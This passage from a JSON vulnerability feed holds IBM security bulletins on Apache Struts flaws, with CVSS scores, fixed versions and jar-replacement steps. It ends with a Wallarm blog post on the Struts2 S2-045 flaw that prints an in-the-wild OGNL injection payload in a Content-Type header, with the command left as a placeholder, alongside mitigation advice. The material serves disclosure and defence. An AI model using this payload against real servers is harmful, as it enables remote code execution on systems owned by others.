**[**_CVE-2014-7809_**](<https://vulners.com/cve/CVE-2014-7809>) \n**DESCRIPTION: ** \nApache Struts could allow a remote attacker to bypass security restrictions, caused by predictable tokens. By sending a specially crafted request, an attacker could exploit this vulnerability to bypass cross-site request forgery security measures. \n \nCVSS Base Score: 4.3 \nCVSS Temporal Score: See [_http://xforce.iss.net/xforce/xfdb/98963_](<http://xforce.iss.net/xforce/xfdb/98963>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: AV:N/AC:M/Au:N/C:N/I:P/A:N\n\n## Affected Products and Versions\n\n_FlashSystem V840 including machine type models (all available code levels) _ \n9846-AC0, 9848-AC0, 9846-AC1, & 9848-AC1. The Service Assist GUI is the only component in these products that uses the Apache Struts library. \n\n## Remediation/Fixes\n\n_<Product_\n\n| _VRMF_| _APAR_| _Remediation/First Fix_ \n---|---|---|--- \n**V840 MTMs:** 9846-AC0, \n9846-AC1, \n9848-AC0, \n9848-AC1| _A code fix is now available, the VRMF of this code level is 7.3.0.4 (or later)_| _ __N/A_| _No work arounds or mitigations, other than applying this code fix, are known for this Struts vulnerability_ \n \n**Note:** \nV840 customers must upgrade the code of both the -AE1 and -ACx (whether -AC0 or -AC1) nodes to address this vulnerability. A customer reading this to fix one model type (e.g. \u2013AC1) should look for the corresponding security bulletin which describes how to fix the other model type (e.g. perhaps \u2013AE1) in the customer's V840. \n\n\n[_Link to FlashSystem 840 fixes_](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Flash+high+availability+systems&product=ibm/StorageSoftware/IBM+FlashSystem+840&release=All&platform=All&function=all>)\n\n \n[_Link to FlashSystem V840 fixes_](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Flash+high+availability+systems&product=ibm/StorageSoftware/IBM+FlashSystem+V840&release=All&platform=All&function=all>)\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {}, "published": "2018-06-18T00:09:27", "type": "ibm", "title": "Security Bulletin: The IBM FlashSystem V840 product model numbers AC0 and AC1 nodes are affected by vulnerabilities in Apache\u2019s Struts library (CVE-2014-7809)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-7809"], "modified": "2018-06-18T00:09:27", "id": "C07414E8C52FB3463AC172E97ABC5C7C15B6D3B1D98BDB2065BF167AE36DA8E9", "href": "https://www.ibm.com/support/pages/node/690435", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-13T05:37:40", "description": "## Summary\n\nThere is a vulnerability in Apache Struts to which the IBM\u00ae FlashSystem\u2122 V840 is susceptible. An exploit of this vulnerability could allow a remote attacker to gain unauthorized access to the system.\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2015-5209_](<https://vulners.com/cve/CVE-2015-5209>)** \nDESCRIPTION:** Apache Struts could allow a remote attacker to gain unauthorized access to the system. An attacker could exploit this vulnerability using a special top-level object to manipulate internal settings and modify another user session. \nCVSS Base Score: 9.1 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/106695_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/106695>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N)\n\n## Affected Products and Versions\n\n_FlashSystem V840 including machine type and models (MTMs) for all available code levels._ MTMs affected include 9846-AE1, 9848-AE1, 9846-AC0, 9848-AC0, 9846-AC1, and 9848-AC1.\n\n## Remediation/Fixes\n\n_V840 MTMs_\n\n| _VRMF_| _APAR_| _Remediation/First Fix_ \n---|---|---|--- \n**Storage nodes:** \n9846-AE1 & \n9848-AE1 \n \n**Control nodes:** 9846-AC0, \n9846-AC1, \n9848-AC0 & \n9848-AC1| _Code fixes are now available, the minimum VRMF containing the fix depends on the code stream: \n \n___Storage Node VRMF .___ _ \n_1.4 stream: 1.4.0.10 (or later)_ \n_1.3 stream: 1.3.0.5 (or later)_ \n_1.2 stream: 1.2.1.9 (or later)_ \n \n__Controller Node VRMF .__ \n_7.6 stream: 7.6.0.4 (or later)_ \n_7.5 stream: 7.5.0.7 (or later)_ \n_7.4 stream: 7.4.0.9 (or later)_| _ __N/A_| _No workarounds or mitigations, other than applying this code fix, are known for this vulnerability_ \n \n \n[**_FlashSystem V840 fixes_**](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Flash%2Bhigh%2Bavailability%2Bsystems&product=ibm/StorageSoftware/IBM+FlashSystem+V840&release=1.0&platform=All&function=all>)** **for storage and controller node** **are available @ IBM\u2019s Fix Central \n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2018-06-18T00:10:20", "type": "ibm", "title": "Security Bulletin:A vulnerability in Struts affects the IBM FlashSystem model V840 (CVE-2015-5209)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-5209"], "modified": "2018-06-18T00:10:20", "id": "6900D265BE47AA90C298D0D7770A85C4D26AD1BCA850041A3008AD885B0E1606", "href": "https://www.ibm.com/support/pages/node/690789", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-07-30T09:48:20", "description": "## Summary\n\nThere is a vulnerability in Apache Struts to which the IBM\u00ae FlashSystem\u2122 840 and IBM FlashSystem 900 are susceptible. An exploit of this vulnerability could allow a remote attacker to gain unauthorized access to the system.\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2015-5209_](<https://vulners.com/cve/CVE-2015-5209>)** \nDESCRIPTION:** Apache Struts could allow a remote attacker to gain unauthorized access to the system. An attacker could exploit this vulnerability using a special top-level object to manipulate internal settings and modify another user session. \nCVSS Base Score: 9.1 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/106695_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/106695>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N) \n\n## Affected Products and Versions\n\nFlashSystem 840 including machine type and models (MTMs) for all available code levels. MTMs affected include 9840-AE1 and 9843-AE1. \n \nFlashSystem 900 including machine type and models (MTMs) for all available code levels. MTMs affected include 9840-AE2 and 9843-AE2.\n\n## Remediation/Fixes\n\n_MTMs_\n\n| _VRMF_| _APAR_| _Remediation/First Fix_ \n---|---|---|--- \n**FlashSystem ****840 MTM: ** \n9840-AE1 & \n9843-AE1 \n \n**FlashSystem 900 MTMs:** \n9840-AE2 & \n9843-AE2| _Code fixes are now available, the minimum VRMF containing the fix depends on the code stream: \n \n___Fixed code VRMF .__ \n_1.4 stream: 1.4.0.10 (or later)_ \n_1.3 stream: 1.3.0.5 (or later)_ \n_1.2 stream: 1.2.1.9 (or later)_| _ __N/A_| _No workarounds or mitigations, other than applying this code fix, are known for this vulnerability_ \n \n** \n**[**_FlashSystem 840 fixes_**](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Flash%2Bhigh%2Bavailability%2Bsystems&product=ibm/StorageSoftware/IBM+FlashSystem+840&release=All&platform=All&function=all>)** **and [**_FlashSystem 900 fixes_**](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Flash%2Bhigh%2Bavailability%2Bsystems&product=ibm/StorageSoftware/IBM+FlashSystem+900&release=All&platform=All&function=all>)** **are available @ IBM\u2019s Fix Central \n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2023-02-18T01:45:50", "type": "ibm", "title": "Security Bulletin: A vulnerability in Struts affects the IBM FlashSystem models 840 and 900 (CVE-2015-5209)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-5209"], "modified": "2023-02-18T01:45:50", "id": "DFFF28230614331A1F13B0124F5F0C7C78FA27A1A224A596CB2E642B9DA21C5A", "href": "https://www.ibm.com/support/pages/node/690785", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-06-06T17:50:13", "description": "## Summary\n\nIBM Sterling Order Management Apache Struts vulnerablity\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2020-17530](<https://vulners.com/cve/CVE-2020-17530>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by a forced double OGNL evaluation on raw user input in tag attributes. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 8.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/192743](<https://exchange.xforce.ibmcloud.com/vulnerabilities/192743>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Sterling Order Management| 10.0 \nIBM Sterling Order Management| 9.5.x \nIBM Sterling Order Management| 9.4.x \n \n\n\n## Remediation/Fixes\n\nOrder Management on premise release notes - <https://www.ibm.com/docs/en/order-management-sw/10.0?topic=software-fixes-by-fix-pack-version>\n\nFix Central Link (**FP details URL)**: \n[http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FOther+software%2FSterling+Selling+and+Fulfillment+Foundation&fixids=10.0.0.0-Sterling-SSFF-All-fp29-Installer&source=SAR](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FOther+software%2FSterling+Selling+and+Fulfillment+Foundation&fixids=10.0.0.0-Sterling-SSFF-All-fp29-Installer&source=SAR>)\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-11T01:06:34", "type": "ibm", "title": "Security Bulletin: IBM Sterling Order Management Apache Struts vulnerablity", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17530"], "modified": "2022-05-11T01:06:34", "id": "DE610DDFE9494156D25DDA58CDDC5C5009E3BBAAB1D9C6FC73CE6056DFE0DCFA", "href": "https://www.ibm.com/support/pages/node/6565855", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-06T17:49:20", "description": "## Summary\n\nVulnerability found in Apache struts2-core-2.5.22 used by Content Collector for Email, Content Collector for File Systems, Content Collector for Microsoft SharePoint and Content Collector for IBM Connections\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2020-17530](<https://vulners.com/cve/CVE-2020-17530>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by a forced double OGNL evaluation on raw user input in tag attributes. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 8.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/192743](<https://exchange.xforce.ibmcloud.com/vulnerabilities/192743>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nContent Collector for IBM Connections| 4.0.x \n \n\n\n## Remediation/Fixes\n\n**Product** | **VRM**| **Remediation** \n---|---|--- \nContent Collector for Email| 4.0.1| Use Content Collector for Email [4.0.1.14-IBM-ICC-IF004](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.14-IBM-ICC-IF004&source=SAR> \"4.0.1.14-IBM-ICC-IF004\" ) \nContent Collector for File Systems| 4.0.1| Use Content Collector for File Systems [4.0.1.14-IBM-ICC-IF004](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.14-IBM-ICC-IF004&source=SAR> \"4.0.1.14-IBM-ICC-IF004\" ) \nContent Collector for Microsoft SharePoint| 4.0.1| Use Content Collector for Microsoft SharePoint [4.0.1.14-IBM-ICC-IF004](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.14-IBM-ICC-IF004&source=SAR> \"4.0.1.14-IBM-ICC-IF004\" ) \nContent Collector for IBM Connections| 4.0.1| Use Content Collector for IBM Connections [4.0.1.14-IBM-ICC-IF004](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.14-IBM-ICC-IF004&source=SAR> \"4.0.1.14-IBM-ICC-IF004\" ) \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-09T08:03:35", "type": "ibm", "title": "Security Bulletin: CVE-2020-17530 may affect Apache struts2-core used by Content Collector for Email, Content Collector for File Systems, Content Collector for Microsoft SharePoint and Content Collector for IBM Connections", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17530"], "modified": "2022-06-09T08:03:35", "id": "6AB7EE25CEFEC99E5658BEFE4D594FAAA375C1558F00A1900E6FF8619C6CA80A", "href": "https://www.ibm.com/support/pages/node/6593791", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-21T21:53:10", "description": "## Summary\n\nApache Struts is vulnerable to cross-site scripting, caused by improper validation of user-supplied input by the URLDecoder implementation. A remote attacker could exploit this vulnerability using a specially-crafted URL to execute script in a victim's Web browser within the security context of the hosting Web site, once the URL is clicked. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials.\n\n## Affected Products and Versions\n\nPlatform Cluster Manager Standard Edition Version 4.1.0, 4.1.1 and 4.1.1.1 \nPlatform Cluster Manager Advanced Edition Version 4.2.0, 4.2.0.1, 4.2.0.2 and 4.2.1 \nPlatform HPC Version 4.1.1, 4.1.1.1, 4.2.0 and 4.2.1\n\n## Remediation/Fixes\n\nSee workarounds\n\n## Workarounds and Mitigations\n\n**Platform Cluster Manager 4.2.1 & Platform HPC 4.2.1**\n\n1\\. Download the struts-2.3.28-lib.zip package from the following location: [_http://archive.apache.org/dist/struts/2.3.28/_](<http://archive.apache.org/dist/struts/2.3.28/>)\n\n2\\. Copy the struts-2.3.28-lib.zip package to the management node.\n\n3\\. Extract the struts-2.3.28-lib.zip package on the management node.\n\n# unzip struts-2.3.28-lib.zip # cd struts-2.3.28/lib # cp xwork-core-2.3.28.jar /opt/pcm/web-portal/gui/3.0/wlp/usr/servers/platform/apps/platform.war/WEB-INF/lib# cp struts2-core-2.3.28.jar /opt/pcm/web-portal/gui/3.0/wlp/usr/servers/platform/apps/platform.war/WEB-INF/lib# cp struts2-jasperreports-plugin-2.3.28.jar /opt/pcm/web-portal/gui/3.0/wlp/usr/servers/platform/apps/platform.war/WEB-INF/lib# cp struts2-json-plugin-2.3.28.jar /opt/pcm/web-portal/gui/3.0/wlp/usr/servers/platform/apps/platform.war/WEB-INF/lib# cp struts2-spring-plugin-2.3.28.jar /opt/pcm/web-portal/gui/3.0/wlp/usr/servers/platform/apps/platform.war/WEB-INF/lib# cp freemarker-2.3.22.jar /opt/pcm/web-portal/gui/3.0/wlp/usr/servers/platform/apps/platform.war/WEB-INF/lib\n\n \n# cp ognl-3.0.13.jar /opt/pcm/web-portal/gui/3.0/wlp/usr/servers/platform/apps/platform.war/WEB-INF/lib \n# mkdir -p /root/backup \n# mv /opt/pcm/web-portal/gui/3.0/wlp/usr/servers/platform/apps/platform.war/WEB-INF/lib/struts2-core-2.3.16.3.jar /root/backup# mv /opt/pcm/web-portal/gui/3.0/wlp/usr/servers/platform/apps/platform.war/WEB-INF/lib/struts2-json-plugin-2.3.16.3.jar /root/backup# mv /opt/pcm/web-portal/gui/3.0/wlp/usr/servers/platform/apps/platform.war/WEB-INF/lib/struts2-spring-plugin-2.3.16.3.jar /root/backup# mv /opt/pcm/web-portal/gui/3.0/wlp/usr/servers/platform/apps/platform.war/WEB-INF/lib/xwork-core-2.3.16.3.jar /root/backup# mv /opt/pcm/web-portal/gui/3.0/wlp/usr/servers/platform/apps/platform.war/WEB-INF/lib/freemarker-2.3.18.jar /root/backup \n# mv /opt/pcm/web-portal/gui/3.0/wlp/usr/servers/platform/apps/platform.war/WEB-INF/lib/ognl-3.0.6.jar /root/backup \n\n\n4\\. Restart Platform HPC services. If high availability is enabled, run the following commands on the active management node: \n\n# pcmhatool failmode -m manual # pcmadmin service stop --service WEBGUI# pcmadmin service start --service WEBGUI# pcmhatool failmode -m auto\n\n \nOtherwise, if high availability is not enabled, run the following commands on the management node: \n# pcmadmin service stop --service WEBGUI# pcmadmin service start --service WEBGUI \n\n**Platform Cluster Manager 4.2.0 4.2.0.x & Platform HPC 4.2.0 4.2.0.x**\n\n1\\. Download the struts-2.3.28-lib.zip package from the following location: [_http://archive.apache.org/dist/struts/2.3.28/_](<http://archive.apache.org/dist/struts/2.3.28/>)\n\n2\\. Copy the struts-2.3.28-lib.zip package to the management node.\n\n3\\. Extract the struts-2.3.28-lib.zip package on the management node.\n\n# unzip struts-2.3.28-lib.zip # cd struts-2.3.28/lib # cp xwork-core-2.3.28.jar /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib# cp struts2-jasperreports-plugin-2.3.28.jar /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib# cp struts2-core-2.3.28.jar /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib# cp struts2-json-plugin-2.3.28.jar /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib# cp struts2-spring-plugin-2.3.28.jar /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib# cp freemarker-2.3.22.jar /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib\n\n \n# cp ognl-3.0.13.jar /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib \n# mkdir -p /root/backup# mv /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib/struts2-core-2.3.16.3.jar /root/backup# mv /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib/struts2-json-plugin-2.3.16.3.jar /root/backup# mv /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib/struts2-spring-plugin-2.3.16.3.jar /root/backup# mv /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib/xwork-core-2.3.16.3.jar /root/backup# mv /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib/freemarker-2.3.18.jar /root/backup \n# mv /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib/ognl-3.0.6.jar /root/backup \n\n4\\. Restart Platform HPC services. If high availability is enabled, run the following commands on the active management node:\n\n \n# pcmhatool failmode -m manual # pcmadmin service stop --service WEBGUI# pcmadmin service start --service WEBGUI# pcmhatool failmode -m auto \nOtherwise, if high availability is not enabled, run the following commands on the management node: \n# pcmadmin service stop --service WEBGUI# pcmadmin service start --service WEBGUI \n\n**Platform Cluster Manager 4.1.x & Platform HPC 4.1.x**\n\n1\\. Download the struts-2.3.28-lib.zip package from the following location: [_http://archive.apache.org/dist/struts/2.3.28/_](<http://archive.apache.org/dist/struts/2.3.28/>)\n\n2\\. Copy the struts-2.3.28-lib.zip package to the management node.\n\n3\\. Extract the struts-2.3.28-lib.zip package on the management node\n\n# unzip struts-2.3.28-lib.zip # cd struts-2.3.28/lib/ # cp xwork-core-2.3.28.jar /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib# cp struts2-core-2.3.28.jar /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib# cp struts2-json-plugin-2.3.28.jar /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib# cp struts2-spring-plugin-2.3.28.jar /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib# cp freemarker-2.3.22.jar /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib# cp struts2-jasperreports-plugin-2.3.28.jar /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib\n\n \n# cp ognl-3.0.13.jar /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib \n# mkdir -p /root/backup# mv /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib/struts2-core-2.3.15.2.jar /root/backup# mv /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib/struts2-json-plugin-2.3.15.2.jar /root/backup# mv /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib/struts2-spring-plugin-2.3.15.2.jar /root/backup# mv /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib/xwork-core-2.3.15.2.jar /root/backup# mv /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib/freemarker-2.3.18.jar /root/backup \n# mv /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib/ognl-3.0.6.jar /root/backup \n\n4\\. Restart Platform HPC services. If high availability is enabled, run the following commands on the active management node:\n\n# pcmhatool failmode -m manual # pmcadmin stop# pmcadmin start# pcmhatool failmode -m auto\n\nOtherwise, if high availability is not enabled, run the following commands on the management node:\n\n# pmcadmin stop\n\n \n# pmcadmin start \n\n## ", "cvss3": {}, "published": "2018-06-18T01:32:26", "type": "ibm", "title": "Security Bulletin: OPEN Source Apache Struts Vulnerabilities IBM Platform Cluster Manager Standard Edition, IBM Platform Cluster Manager Advanced Edition, and Platform HPC (CVE-2016-4003)", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2016-4003"], "modified": "2018-06-18T01:32:26", "id": "055E59F2851A7F333363149D5BB7D9E0D90ADD13DFCB70EC1FF9D592FA2988C8", "href": "https://www.ibm.com/support/pages/node/629045", "cvss": {"score": 0.0, "vector": "NONE"}}], "wallarmlab": [{"lastseen": "2017-05-01T13:42:41", "description": "Two days ago Apache has published a fix for the new [Remote Code Execution vulnerability in Struts2](<https://cwiki.apache.org/confluence/display/WW/S2-045>).\n\n![](https://cdn-images-1.medium.com/max/1024/1*iTFhKuC3aJ3XSL8wJ_NqVg.png)Struts2 RCE attacks in the wild\n\nThis vulnerability allows attacker to execute arbitrary Java code on the application server.\n\nWe can confirm that caught the first exploit for this vulnerability from the wild. And this is crazy. Like previous OGNL exploits this one is also based on the OGNL macroses to construct and call shell command via sequence of Java classes.\n\n#### Exploit\n\n[Wallarm](<http://wallarm.com>) has first caught the exploit on Mar 8, 03:34 am. Please look the sample malicious HTTP request below:\n \n \n GET /valid-struts.action HTTP/1.1 \n User-Agent: any \n Content-Type: %{(#_=\u2018multipart/form-data\u2019).(#dm=[@ognl](<http://twitter.com/ognl>).OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[\u2018com.opensymphony.xwork2.ActionContext.container\u2019]).(#ognlUtil=#container.getInstance([@com](<http://twitter.com/com>).opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmds=(<some malicious code here>).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=([@org](<http://twitter.com/org>).apache.struts2.ServletActionContext@getResponse().getOutputStream())).([@org](<http://twitter.com/org>).apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}\n\n#### Mitigation\n\nPlease check that you\u2019ve already updated to [Struts 2.3.32](<https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.3.32>) or [Struts 2.5.10.1](<https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.5.10.1>)\n\nIf you are unable to update Struts2 immediately you should apply virtual patch to your WAF. It\u2019s essentially similar to the previous OGNL exploits however it\u2019s likely to not be covered by many existing WAF signatures. If using old-fashion Web Application Firewall make sure to add this string as a new signature:\n \n \n %{(#_=\u2019multipart/form-data\u2019)\n\n#### History\n\nHere is a list of all historical OGNL security issues in Struts2:\n\n * <https://www.cvedetails.com/cve/CVE-2016-3093/>\n * <https://www.cvedetails.com/cve/CVE-2016-0785/>\n * <https://www.cvedetails.com/cve/CVE-2013-2251/>\n * <https://www.cvedetails.com/cve/CVE-2013-2135/>\n * <https://www.cvedetails.com/cve/CVE-2013-2134/>\n * <https://www.cvedetails.com/cve/CVE-2013-2115/>\n * <https://www.cvedetails.com/cve/CVE-2013-1966/>\n * <https://www.cvedetails.com/cve/CVE-2013-1965/>\n * <https://www.cvedetails.com/cve/CVE-2012-4387/>\n * <https://www.cvedetails.com/cve/CVE-2012-0838/>\n * <https://www.cvedetails.com/cve/CVE-2012-0391/>\n * <https://www.cvedetails.com/cve/CVE-2010-1870/>\n * <https://www.cvedetails.com/cve/CVE-2008-6504/>\n\nIt means that the OGNL technology are broken altogether.\n\n![](https://medium.com/_/stat?event=post.clientViewed&referrerSource=full_rss&postId=34e52fa8e2)\n\n* * *\n\n[New Struts2 Remote Code Execution exploit caught in the wild](<https://lab.wallarm.com/new-struts2-remote-code-execution-exploit-caught-in-the-wild-34e52fa8e2>) was originally published in [Wallarm](<https://lab.wallarm.com>) on Medium, where people are continuing the conversation by highlighting and responding to this story.", "cvss3": {}, "published": "2017-03-09T00:15:54", "title": "New Struts2 Remote Code Execution exploit caught in the wild", "type": 